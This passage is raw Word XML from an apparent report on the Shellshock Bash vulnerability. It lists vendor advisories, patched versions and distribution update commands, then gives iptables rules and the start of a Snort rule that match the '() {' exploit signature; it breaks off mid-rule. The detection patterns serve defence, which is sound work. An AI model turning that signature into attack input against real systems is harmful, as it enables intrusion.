            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>BASH-4.3.25-2.fc21 (Fedora 21)</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yum update bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F636E9" w:rsidRPr="00295AD1">
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="120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r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>Ubuntu</w:t>
            </w:r>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USN-2362-1 (CVE-2014-6271) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve">USN-2363-1 (CVE-2014-7169) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve">4.1-2ubuntu3.2 (Ubuntu 10.04 LTS) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve">4.2-2ubuntu2.3 (Ubuntu 12.04 LTS) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>4.3-7ubuntu1.2 (Ubuntu 14.04 LTS)</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apt-get update &amp;&amp; </w:t>
            </w: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apt-get install --only-upgrade bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F636E9" w:rsidRPr="00295AD1">
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="96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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>SuSE</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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CVE-2014-6271/Bug 896776 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2014-7169/Bug 898346 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve">3.2-147.20.1 (SuSE11) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>3.1-24.32.1 (SuSE10)</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zypper</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve"> ref -s</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>zypper</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve"> up bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F636E9" w:rsidRPr="00295AD1">
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="120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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>Debian</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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DSA-3032-1 (CVE-2014-6271) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve">DSA-3035-1 (CVE-2014-7169) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>4.1-3+deb6u2 (squeeze (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>lts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve">)) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>4.2+dfsg-0.1+deb7u3 (wheezy(security)) 4.3-9.2 (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>sid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>)</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apt-get update &amp;&amp; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get install --only-upgrade bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F636E9" w:rsidRPr="00295AD1">
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="144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r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>Gentoo</w:t>
            </w:r>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Bug 523592 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve">BASH-3.1_p18-r1 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve">BASH-3.2_p52-r1 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve">BASH-4.0_p39-r1 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve">BASH-4.1_p12-r1 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>BASH-4.2_p48-r1</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 xml:space="preserve"> emerge --sync</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve"> emerge --ask --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>oneshot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t xml:space="preserve"> --verbose "&gt;=app-shells/bash-4.2_p48-r1"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F636E9" w:rsidRPr="00295AD1">
        <w:tblPrEx>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="485"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1809"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rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle6"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>AWS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4406"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CVE-2014-6271</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>CVE-2014-7169</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="313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F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>Advisory ALAS-2014-418</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
            <w:pPr>
              <w:pStyle w:val="TableStyle2"/>
            </w:pPr>
            <w:r w:rsidRPr="00295AD1">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              </w:rPr>
              <w:t>Advisory ALAS-2014-419</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Updating Bash or switching to alternatives could lead to</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unknown problems and disruption of cu</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rent running programs</w:t>
      </w:r>
      <w:r w:rsidRPr="00316A35">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">in the system due to dependencies. In such case, one could install the patches provided by the system or service vendors. In fact, briefly after the explosion of Shellshock, major system or service providers had already pushed their patches to fix the bug. However, early patches are believed to only correct part of the vulnerability. Thus, installation of the latest patches is strongly recommended.  Besides strengthening Bash, firewalls and intrusion detection systems or intrusion prevention systems can also be tuned to intercept suspicious requests. Below are the rules for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="0009140A" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Snort</w:t>
      </w:r>
      <w:r w:rsidR="0009140A" w:rsidRPr="0009140A">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> [13]</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>iptables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-A INPUT -m string -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>algo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hexstring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘|28 29 20 7B|</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-j DROP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"># ip6tables </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-A INPUT -m string -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>algo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hexstring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘|28 29 20 7B|</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-j DROP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Snort:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> $EXTERNAL_NET any &gt; $HOME_NET $HTTP_PORTS (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">:”Possible CVE20146271 BASH Vulnerability Requested (header) “; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
